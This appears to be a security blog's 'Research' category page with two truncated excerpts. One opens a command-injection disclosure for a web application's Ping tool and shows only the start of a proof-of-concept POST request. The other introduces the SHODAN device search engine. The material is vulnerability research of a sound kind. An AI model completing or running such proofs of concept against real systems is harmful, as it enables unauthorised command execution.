Category: Research

Description: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. https://www.owasp.org/index.php/Command_Injection Vulnerable Menu: Tools – Ping Proof of Concept: POST /u/jsp/tools/exec.jsp HTTP/1.1 Host: 192.168.0.13:8081 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, […]

Have you ever heard SHODAN Search Engine? SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners. SHODAN also lets you use boolean operators (‘+’, ‘-‘ and ‘|’) to […]